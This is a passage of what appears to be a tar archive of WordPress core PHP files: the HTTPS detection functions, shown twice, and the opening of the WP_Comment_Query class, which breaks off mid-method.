if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605111710-20260621081200.php 0000666 00000013341 15224151220 0013323 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
class-wp-comment-query-20260621140931.php 0000666 00000137244 15224151220 0013204 0 ustar 00 <?php
/**
* Comment API: WP_Comment_Query class
*
* @package WordPress
* @subpackage Comments
* @since 4.4.0
*/
/**
* Core class used for querying comments.
*
* @since 3.1.0
*
* @see WP_Comment_Query::__construct() for accepted arguments.
*/
#[AllowDynamicProperties]
class WP_Comment_Query {
/**
* SQL for database query.
*
* @since 4.0.1
* @var string
*/
public $request;
/**
* Metadata query container
*
* @since 3.5.0
* @var WP_Meta_Query A meta query instance.
*/
public $meta_query = false;
/**
* Metadata query clauses.
*
* @since 4.4.0
* @var array
*/
protected $meta_query_clauses;
/**
* SQL query clauses.
*
* @since 4.4.0
* @var array
*/
protected $sql_clauses = array(
'select' => '',
'from' => '',
'where' => array(),
'groupby' => '',
'orderby' => '',
'limits' => '',
);
/**
* SQL WHERE clause.
*
* Stored after the {@see 'comments_clauses'} filter is run on the compiled WHERE sub-clauses.
*
* @since 4.4.2
* @var string
*/
protected $filtered_where_clause;
/**
* Date query container
*
* @since 3.7.0
* @var WP_Date_Query A date query instance.
*/
public $date_query = false;
/**
* Query vars set by the user.
*
* @since 3.1.0
* @var array
*/
public $query_vars;
/**
* Default values for query vars.
*
* @since 4.2.0
* @var array
*/
public $query_var_defaults;
/**
* List of comments located by the query.
*
* @since 4.0.0
* @var int[]|WP_Comment[]
*/
public $comments;
/**
* The amount of found comments for the current query.
*
* @since 4.4.0
* @var int
*/
public $found_comments = 0;
/**
* The number of pages.
*
* @since 4.4.0
* @var int
*/
public $max_num_pages = 0;
/**
* Make private/protected methods readable for backward compatibility.
*
* @since 4.0.0
*
* @param string $name Method to call.
* @param array $arguments Arguments to pass when calling.
* @return mixed|false Return value of the callback, false otherwise.
*/
public function __call( $name, $arguments ) {
if ( 'get_search_sql' === $name ) {
return $this->get_search_sql( ...$arguments );
}
return false;
}
/**
* Constructor.
*
* Sets up the comment query, based on the query vars passed.
*
* @since 4.2.0
* @since 4.4.0 `$parent__in` and `$parent__not_in` were added.
* @since 4.4.0 Order by `comment__in` was added. `$update_comment_meta_cache`, `$no_found_rows`,
* `$hierarchical`, and `$update_comment_post_cache` were added.
* @since 4.5.0 Introduced the `$author_url` argument.
* @since 4.6.0 Introduced the `$cache_domain` argument.
* @since 4.9.0 Introduced the `$paged` argument.
* @since 5.1.0 Introduced the `$meta_compare_key` argument.
* @since 5.3.0 Introduced the `$meta_type_key` argument.
*
* @param string|array $query {
* Optional. Array or query string of comment query parameters. Default empty.
*
* @type string $author_email Comment author email address. Default empty.
* @type string $author_url Comment author URL. Default empty.
* @type int[] $author__in Array of author IDs to include comments for. Default empty.
* @type int[] $author__not_in Array of author IDs to exclude comments for. Default empty.
* @type int[] $comment__in Array of comment IDs to include. Default empty.
* @type int[] $comment__not_in Array of comment IDs to exclude. Default empty.
* @type bool $count Whether to return a comment count (true) or array of
* comment objects (false). Default false.
* @type array $date_query Date query clauses to limit comments by. See WP_Date_Query.
* Default null.
* @type string $fields Comment fields to return. Accepts 'ids' for comment IDs
* only or empty for all fields. Default empty.
* @type array $include_unapproved Array of IDs or email addresses of users whose unapproved
* comments will be returned by the query regardless of
* `$status`. Default empty.
* @type int $karma Karma score to retrieve matching comments for.
* Default empty.
* @type string|string[] $meta_key Meta key or keys to filter by.
* @type string|string[] $meta_value Meta value or values to filter by.
* @type string $meta_compare MySQL operator used for comparing the meta value.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_compare_key MySQL operator used for comparing the meta key.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type MySQL data type that the meta_value column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type string $meta_type_key MySQL data type that the meta_key column will be CAST to for comparisons.
* See WP_Meta_Query::__construct() for accepted values and default value.
* @type array $meta_query An associative array of WP_Meta_Query arguments.
* See WP_Meta_Query::__construct() for accepted values.
* @type int $number Maximum number of comments to retrieve.
* Default empty (no limit).
* @type int $paged When used with `$number`, defines the page of results to return.
* When used with `$offset`, `$offset` takes precedence. Default 1.
* @type int $offset Number of comments to offset the query. Used to build
* LIMIT clause. Default 0.
* @type bool $no_found_rows Whether to disable the `SQL_CALC_FOUND_ROWS` query.
* Default: true.
* @type string|array $orderby Comment status or array of statuses. To use 'meta_value'
* or 'meta_value_num', `$meta_key` must also be defined.
* To sort by a specific `$meta_query` clause, use that
* clause's array key. Accepts:
* - 'comment_agent'
* - 'comment_approved'
* - 'comment_author'
* - 'comment_author_email'
* - 'comment_author_IP'
* - 'comment_author_url'
* - 'comment_content'
* - 'comment_date'
* - 'comment_date_gmt'
* - 'comment_ID'
* - 'comment_karma'
* - 'comment_parent'
* - 'comment_post_ID'
* - 'comment_type'
* - 'user_id'
* - 'comment__in'
* - 'meta_value'
* - 'meta_value_num'
* - The value of `$meta_key`
* - The array keys of `$meta_query`
* - false, an empty array, or 'none' to disable `ORDER BY` clause.
* Default: 'comment_date_gmt'.
* @type string $order How to order retrieved comments. Accepts 'ASC', 'DESC'.
* Default: 'DESC'.
* @type int $parent Parent ID of comment to retrieve children of.
* Default empty.
* @type int[] $parent__in Array of parent IDs of comments to retrieve children for.
* Default empty.
* @type int[] $parent__not_in Array of parent IDs of comments *not* to retrieve
* children for. Default empty.
* @type int[] $post_author__in Array of author IDs to retrieve comments for.
* Default empty.
* @type int[] $post_author__not_in Array of author IDs *not* to retrieve comments for.
* Default empty.
* @type int $post_id Limit results to those affiliated with a given post ID.
* Default 0.
* @type int[] $post__in Array of post IDs to include affiliated comments for.
* Default empty.
* @type int[] $post__not_in Array of post IDs to exclude affiliated comments for.
* Default empty.
* @type int $post_author Post author ID to limit results by. Default empty.
* @type string|string[] $post_status Post status or array of post statuses to retrieve
* affiliated comments for. Pass 'any' to match any value.
* Default empty.
* @type string|string[] $post_type Post type or array of post types to retrieve affiliated
* comments for. Pass 'any' to match any value. Default empty.
* @type string $post_name Post name to retrieve affiliated comments for.
* Default empty.
* @type int $post_parent Post parent ID to retrieve affiliated comments for.
* Default empty.
* @type string $search Search term(s) to retrieve matching comments for.
* Default empty.
* @type string|array $status Comment statuses to limit results by. Accepts an array
* or space/comma-separated list of 'hold' (`comment_status=0`),
* 'approve' (`comment_status=1`), 'all', or a custom
* comment status. Default 'all'.
* @type string|string[] $type Include comments of a given type, or array of types.
* Accepts 'comment', 'pings' (includes 'pingback' and
* 'trackback'), or any custom type string. Default empty.
* @type string[] $type__in Include comments from a given array of comment types.
* Default empty.
* @type string[] $type__not_in Exclude comments from a given array of comment types.
* Default empty.
* @type int $user_id Include comments for a specific user ID. Default empty.
* @type bool|string $hierarchical Whether to include comment descendants in the results.
* - 'threaded' returns a tree, with each comment's children
* stored in a `children` property on the `WP_Comment` object.
* - 'flat' returns a flat array of found comments plus
* their children.
* - Boolean `false` leaves out descendants.
* The parameter is ignored (forced to `false`) when
* `$fields` is 'ids' or 'counts'. Accepts 'threaded',
* 'flat', or false. Default: false.
* @type string $cache_domain Unique cache key to be produced when this query is stored in
* an object cache. Default is 'core'.
* @type bool $update_comment_meta_cache Whether to prime the metadata cache for found comments.
* Default true.
* @type bool $update_comment_post_cache Whether to prime the cache for comment posts.
* Default false.
* }
*/
public function __construct( $query = '' ) {
$this->query_var_defaults = array(
'author_email' => '',
'author_url' => '',
'author__in' => '',
'author__not_in' => '',
'include_unapproved' => '',
'fields' => '',
'ID' => '',
'comment__in' => '',
'comment__not_in' => '',
'karma' => '',
'number' => '',
'offset' => '',
'no_found_rows' => true,
'orderby' => '',
'order' => 'DESC',
'paged' => 1,
'parent' => '',
'parent__in' => '',
'parent__not_in' => '',
'post_author__in' => '',
'post_author__not_in' => '',
'post_ID' => '',
'post_id' => 0,
'post__in' => '',
'post__not_in' => '',
'post_author' => '',
'post_name' => '',
'post_parent' => '',
'post_status' => '',
'post_type' => '',
'status' => 'all',
'type' => '',
'type__in' => '',
'type__not_in' => '',
'user_id' => '',
'search' => '',
'count' => false,
'meta_key' => '',
'meta_value' => '',
'meta_query' => '',
'date_query' => null, // See WP_Date_Query.
'hierarchical' => false,
'cache_domain' => 'core',
'update_comment_meta_cache' => true,
'update_comment_post_cache' => false,
);
if ( ! empty( $query ) ) {
$this->query( $query );
}
}
/**
* Parse arguments passed to the comment query with default query parameters.
*
* @since 4.2.0 Extracted from WP_Comment_Query::query().
*
* @param string|array $query WP_Comment_Query arguments. See WP_Comment_Query::__construct() for accepted arguments.
*/
public function parse_query( $query = '' ) {
if ( empty( $query ) ) {
$query = $this->query_vars;
}
$this->query_vars = wp_parse_args( $query, $this->query_var_defaults );
/**
* Fires after the comment query vars have been parsed.
*
* @since 4.2.0
*
* @param WP_Comment_Query $query The WP_Comment_Query instance (passed by reference).
*/
do_action_ref_array( 'parse_comment_query', array( &$this ) );
}
/**
* Sets up the WordPress query for retrieving comments.
*
* @since 3.1.0
* @since 4.1.0 Introduced 'comment__in', 'comment__not_in', 'post_author__in',
* 'post_author__not_in', 'author__in', 'author__not_in', 'post__in',
* 'post__not_in', 'include_unapproved', 'type__in', and 'type__not_in'
* arguments to $query_vars.
* @since 4.2.0 Moved parsing to WP_Comment_Query::parse_query().
*
* @param string|array $query Array or URL query string of parameters.
* @return array|int List of comments, or number of comments when 'count' is passed as a query var.
*/
public function query( $query ) {
$this->query_vars = wp_parse_args( $query );
return $this->get_comments();
}
/**
* Get a list of comments matching the query vars.
*
* @since 4.2.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|int[]|WP_Comment[] List of comments or number of found comments if `$count` argument is true.
*/
public function get_comments() {
global $wpdb;
$this->parse_query();
// Parse meta query.
$this->meta_query = new WP_Meta_Query();
$this->meta_query->parse_query_vars( $this->query_vars );
/**
* Fires before comments are retrieved.
*
* @since 3.1.0
*
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
do_action_ref_array( 'pre_get_comments', array( &$this ) );
// Reparse query vars, in case they were modified in a 'pre_get_comments' callback.
$this->meta_query->parse_query_vars( $this->query_vars );
if ( ! empty( $this->meta_query->queries ) ) {
$this->meta_query_clauses = $this->meta_query->get_sql( 'comment', $wpdb->comments, 'comment_ID', $this );
}
$comment_data = null;
/**
* Filters the comments data before the query takes place.
*
* Return a non-null value to bypass WordPress' default comment queries.
*
* The expected return type from this filter depends on the value passed
* in the request query vars:
* - When `$this->query_vars['count']` is set, the filter should return
* the comment count as an integer.
* - When `'ids' === $this->query_vars['fields']`, the filter should return
* an array of comment IDs.
* - Otherwise the filter should return an array of WP_Comment objects.
*
* Note that if the filter returns an array of comment data, it will be assigned
* to the `comments` property of the current WP_Comment_Query instance.
*
* Filtering functions that require pagination information are encouraged to set
* the `found_comments` and `max_num_pages` properties of the WP_Comment_Query object,
* passed to the filter by reference. If WP_Comment_Query does not perform a database
* query, it will not have enough information to generate these values itself.
*
* @since 5.3.0
* @since 5.6.0 The returned array of comment data is assigned to the `comments` property
* of the current WP_Comment_Query instance.
*
* @param array|int|null $comment_data Return an array of comment data to short-circuit WP's comment query,
* the comment count as an integer if `$this->query_vars['count']` is set,
* or null to allow WP to run its normal queries.
* @param WP_Comment_Query $query The WP_Comment_Query instance, passed by reference.
*/
$comment_data = apply_filters_ref_array( 'comments_pre_query', array( $comment_data, &$this ) );
if ( null !== $comment_data ) {
if ( is_array( $comment_data ) && ! $this->query_vars['count'] ) {
$this->comments = $comment_data;
}
return $comment_data;
}
/*
* Only use the args defined in the query_var_defaults to compute the key,
* but ignore 'fields', 'update_comment_meta_cache', 'update_comment_post_cache' which does not affect query results.
*/
$_args = wp_array_slice_assoc( $this->query_vars, array_keys( $this->query_var_defaults ) );
unset( $_args['fields'], $_args['update_comment_meta_cache'], $_args['update_comment_post_cache'] );
$key = md5( serialize( $_args ) );
$last_changed = wp_cache_get_last_changed( 'comment' );
$cache_key = "get_comments:$key";
$cache_value = wp_cache_get_salted( $cache_key, 'comment-queries', $last_changed );
if ( false === $cache_value ) {
$comment_ids = $this->get_comment_ids();
if ( $comment_ids ) {
$this->set_found_comments();
}
$cache_value = array(
'comment_ids' => $comment_ids,
'found_comments' => $this->found_comments,
);
wp_cache_set_salted( $cache_key, $cache_value, 'comment-queries', $last_changed );
} else {
$comment_ids = $cache_value['comment_ids'];
$this->found_comments = $cache_value['found_comments'];
}
if ( $this->found_comments && $this->query_vars['number'] ) {
$this->max_num_pages = (int) ceil( $this->found_comments / $this->query_vars['number'] );
}
// If querying for a count only, there's nothing more to do.
if ( $this->query_vars['count'] ) {
// $comment_ids is actually a count in this case.
return (int) $comment_ids;
}
$comment_ids = array_map( 'intval', $comment_ids );
if ( $this->query_vars['update_comment_meta_cache'] ) {
wp_lazyload_comment_meta( $comment_ids );
}
if ( 'ids' === $this->query_vars['fields'] ) {
$this->comments = $comment_ids;
return $this->comments;
}
_prime_comment_caches( $comment_ids, false );
// Fetch full comment objects from the primed cache.
$_comments = array();
foreach ( $comment_ids as $comment_id ) {
$_comment = get_comment( $comment_id );
if ( $_comment ) {
$_comments[] = $_comment;
}
}
// Prime comment post caches.
if ( $this->query_vars['update_comment_post_cache'] ) {
$comment_post_ids = array();
foreach ( $_comments as $_comment ) {
$comment_post_ids[] = $_comment->comment_post_ID;
}
_prime_post_caches( $comment_post_ids, false, false );
}
/**
* Filters the comment query results.
*
* @since 3.1.0
*
* @param WP_Comment[] $_comments An array of comments.
* @param WP_Comment_Query $query Current instance of WP_Comment_Query (passed by reference).
*/
$_comments = apply_filters_ref_array( 'the_comments', array( $_comments, &$this ) );
// Convert to WP_Comment instances.
$comments = array_map( 'get_comment', $_comments );
if ( $this->query_vars['hierarchical'] ) {
$comments = $this->fill_descendants( $comments );
}
$this->comments = $comments;
return $this->comments;
}
/**
* Used internally to get a list of comment IDs matching the query vars.
*
* @since 4.4.0
* @since 6.9.0 Excludes the 'note' comment type, unless 'all' or the 'note' types are requested.
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return int|array A single count of comment IDs if a count query. An array of comment IDs if a full query.
*/
protected function get_comment_ids() {
global $wpdb;
// Assemble clauses related to 'comment_approved'.
$approved_clauses = array();
// 'status' accepts an array or a comma-separated string.
$status_clauses = array();
$statuses = wp_parse_list( $this->query_vars['status'] );
// Empty 'status' should be interpreted as 'all'.
if ( empty( $statuses ) ) {
$statuses = array( 'all' );
}
// 'any' overrides other statuses.
if ( ! in_array( 'any', $statuses, true ) ) {
foreach ( $statuses as $status ) {
switch ( $status ) {
case 'hold':
$status_clauses[] = "comment_approved = '0'";
break;
case 'approve':
$status_clauses[] = "comment_approved = '1'";
break;
case 'all':
case '':
$status_clauses[] = "( comment_approved = '0' OR comment_approved = '1' )";
break;
default:
$status_clauses[] = $wpdb->prepare( 'comment_approved = %s', $status );
break;
}
}
$approved_clauses[] = '( ' . implode( ' OR ', $status_clauses ) . ' )';
}
// User IDs or emails whose unapproved comments are included, regardless of $status.
if ( ! empty( $this->query_vars['include_unapproved'] ) ) {
$include_unapproved = wp_parse_list( $this->query_vars['include_unapproved'] );
foreach ( $include_unapproved as $unapproved_identifier ) {
// Numeric values are assumed to be user IDs.
if ( is_numeric( $unapproved_identifier ) ) {
$approved_clauses[] = $wpdb->prepare( "( user_id = %d AND comment_approved = '0' )", $unapproved_identifier );
} else {
// Otherwise we match against email addresses.
if ( ! empty( $_GET['unapproved'] ) && ! empty( $_GET['moderation-hash'] ) ) {
// Only include requested comment.
$approved_clauses[] = $wpdb->prepare( "( comment_author_email = %s AND comment_approved = '0' AND {$wpdb->comments}.comment_ID = %d )", $unapproved_identifier, (int) $_GET['unapproved'] );
} else {
// Include all of the author's unapproved comments.
$approved_clauses[] = $wpdb->prepare( "( comment_author_email = %s AND comment_approved = '0' )", $unapproved_identifier );
}
}
}
}
// Collapse comment_approved clauses into a single OR-separated clause.
if ( ! empty( $approved_clauses ) ) {
if ( 1 === count( $approved_clauses ) ) {
$this->sql_clauses['where']['approved'] = $approved_clauses[0];
} else {
$this->sql_clauses['where']['approved'] = '( ' . implode( ' OR ', $approved_clauses ) . ' )';
}
}
$order = ( 'ASC' === strtoupper( $this->query_vars['order'] ) ) ? 'ASC' : 'DESC';
// Disable ORDER BY with 'none', an empty array, or boolean false.
if ( in_array( $this->query_vars['orderby'], array( 'none', array(), false ), true ) ) {
$orderby = '';
} elseif ( ! empty( $this->query_vars['orderby'] ) ) {
$ordersby = is_array( $this->query_vars['orderby'] ) ?
$this->query_vars['orderby'] :
preg_split( '/[,\s]/', $this->query_vars['orderby'] );
$orderby_array = array();
$found_orderby_comment_id = false;
foreach ( $ordersby as $_key => $_value ) {
if ( ! $_value ) {
continue;
}
if ( is_int( $_key ) ) {
$_orderby = $_value;
$_order = $order;
} else {
$_orderby = $_key;
$_order = $_value;
}
if ( ! $found_orderby_comment_id && in_array( $_orderby, array( 'comment_ID', 'comment__in' ), true ) ) {
$found_orderby_comment_id = true;
}
$parsed = $this->parse_orderby( $_orderby );
if ( ! $parsed ) {
continue;
}
if ( 'comment__in' === $_orderby ) {
$orderby_array[] = $parsed;
continue;
}
$orderby_array[] = $parsed . ' ' . $this->parse_order( $_order );
}
// If no valid clauses were found, order by comment_date_gmt.
if ( empty( $orderby_array ) ) {
$orderby_array[] = "$wpdb->comments.comment_date_gmt $order";
}
// To ensure determinate sorting, always include a comment_ID clause.
if ( ! $found_orderby_comment_id ) {
$comment_id_order = '';
// Inherit order from comment_date or comment_date_gmt, if available.
foreach ( $orderby_array as $orderby_clause ) {
if ( preg_match( '/comment_date(?:_gmt)*\ (ASC|DESC)/', $orderby_clause, $match ) ) {
$comment_id_order = $match[1];
break;
}
}
// If no date-related order is available, use the date from the first available clause.
if ( ! $comment_id_order ) {
foreach ( $orderby_array as $orderby_clause ) {
if ( str_contains( 'ASC', $orderby_clause ) ) {
$comment_id_order = 'ASC';
} else {
$comment_id_order = 'DESC';
}
break;
}
}
// Default to DESC.
if ( ! $comment_id_order ) {
$comment_id_order = 'DESC';
}
$orderby_array[] = "$wpdb->comments.comment_ID $comment_id_order";
}
$orderby = implode( ', ', $orderby_array );
} else {
$orderby = "$wpdb->comments.comment_date_gmt $order";
}
$number = absint( $this->query_vars['number'] );
$offset = absint( $this->query_vars['offset'] );
$paged = absint( $this->query_vars['paged'] );
$limits = '';
if ( ! empty( $number ) ) {
if ( $offset ) {
$limits = 'LIMIT ' . $offset . ',' . $number;
} else {
$limits = 'LIMIT ' . ( $number * ( $paged - 1 ) ) . ',' . $number;
}
}
if ( $this->query_vars['count'] ) {
$fields = 'COUNT(*)';
} else {
$fields = "$wpdb->comments.comment_ID";
}
$post_id = absint( $this->query_vars['post_id'] );
if ( ! empty( $post_id ) ) {
$this->sql_clauses['where']['post_id'] = $wpdb->prepare( 'comment_post_ID = %d', $post_id );
}
// Parse comment IDs for an IN clause.
if ( ! empty( $this->query_vars['comment__in'] ) ) {
$this->sql_clauses['where']['comment__in'] = "$wpdb->comments.comment_ID IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['comment__in'] ) ) . ' )';
}
// Parse comment IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['comment__not_in'] ) ) {
$this->sql_clauses['where']['comment__not_in'] = "$wpdb->comments.comment_ID NOT IN ( " . implode( ',', wp_parse_id_list( $this->query_vars['comment__not_in'] ) ) . ' )';
}
// Parse comment parent IDs for an IN clause.
if ( ! empty( $this->query_vars['parent__in'] ) ) {
$this->sql_clauses['where']['parent__in'] = 'comment_parent IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['parent__in'] ) ) . ' )';
}
// Parse comment parent IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['parent__not_in'] ) ) {
$this->sql_clauses['where']['parent__not_in'] = 'comment_parent NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['parent__not_in'] ) ) . ' )';
}
// Parse comment post IDs for an IN clause.
if ( ! empty( $this->query_vars['post__in'] ) ) {
$this->sql_clauses['where']['post__in'] = 'comment_post_ID IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post__in'] ) ) . ' )';
}
// Parse comment post IDs for a NOT IN clause.
if ( ! empty( $this->query_vars['post__not_in'] ) ) {
$this->sql_clauses['where']['post__not_in'] = 'comment_post_ID NOT IN ( ' . implode( ',', wp_parse_id_list( $this->query_vars['post__not_in'] ) ) . ' )';
}
if ( '' !== $this->query_vars['author_email'] ) {
$this->sql_clauses['where']['author_email'] = $wpdb->prepare( 'comment_author_email = %s', $this->query_vars['author_email'] );
}
if ( '' !== $this->query_vars['author_url'] ) {
$this->sql_clauses['where']['author_url'] = $wpdb->prepare( 'comment_author_url = %s', $this->query_vars['author_url'] );
}
if ( '' !== $this->query_vars['karma'] ) {
$this->sql_clauses['where']['karma'] = $wpdb->prepare( 'comment_karma = %d', $this->query_vars['karma'] );
}
// Filtering by comment_type: 'type', 'type__in', 'type__not_in'.
$raw_types = array(
'IN' => array_merge( (array) $this->query_vars['type'], (array) $this->query_vars['type__in'] ),
'NOT IN' => (array) $this->query_vars['type__not_in'],
);
// Exclude the 'note' comment type, unless 'all' types or the 'note' type explicitly are requested.
if (
! in_array( 'all', $raw_types['IN'], true ) &&
! in_array( 'note', $raw_types['IN'], true ) &&
! in_array( 'note', $raw_types['NOT IN'], true )
) {
$raw_types['NOT IN'][] = 'note';
}
$comment_types = array();
foreach ( $raw_types as $operator => $_raw_types ) {
$_raw_types = array_unique( $_raw_types );
foreach ( $_raw_types as $type ) {
switch ( $type ) {
// An empty translates to 'all', for backward compatibility.
case '':
case 'all':
break;
case 'comment':
case 'comments':
$comment_types[ $operator ][] = "''";
$comment_types[ $operator ][] = "'comment'";
break;
case 'pings':
$comment_types[ $operator ][] = "'pingback'";
$comment_types[ $operator ][] = "'trackback'";
break;
default:
$comment_types[ $operator ][] = $wpdb->prepare( '%s', $type );
break;
}
}
if ( ! empty( $comment_types[ $operator ] ) ) {
$types_sql = implode( ', ', $comment_types[ $operator ] );
$this->sql_clauses['where'][ 'comment_type__' . strtolower( str_replace( ' ', '_', $operator ) ) ] = "comment_type $operator ($types_sql)";
}
}
$parent = $this->query_vars['parent'];
if ( $this->query_vars['hierarchical'] && ! $parent ) {
$parent = 0;
}
if ( '' !== $parent ) {
$this->sql_clauses['where']['parent'] = $wpdb->prepare( 'comment_parent = %d', $parent );
}
if ( is_array( $this->query_vars['user_id'] ) ) {
$this->sql_clauses['where']['user_id'] = 'user_id IN (' . implode( ',', array_map( 'absint', $this->query_vars['user_id'] ) ) . ')';
} elseif ( '' !== $this->query_vars['user_id'] ) {
$this->sql_clauses['where']['user_id'] = $wpdb->prepare( 'user_id = %d', $this->query_vars['user_id'] );
}
// Falsey search strings are ignored.
if ( isset( $this->query_vars['search'] ) && strlen( $this->query_vars['search'] ) ) {
$search_sql = $this->get_search_sql(
$this->query_vars['search'],
array( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_author_IP', 'comment_content' )
);
// Strip leading 'AND'.
$this->sql_clauses['where']['search'] = preg_replace( '/^\s*AND\s*/', '', $search_sql );
}
// If any post-related query vars are passed, join the posts table.
$join_posts_table = false;
$plucked = wp_array_slice_assoc( $this->query_vars, array( 'post_author', 'post_name', 'post_parent' ) );
$post_fields = array_filter( $plucked );
if ( ! empty( $post_fields ) ) {
$join_posts_table = true;
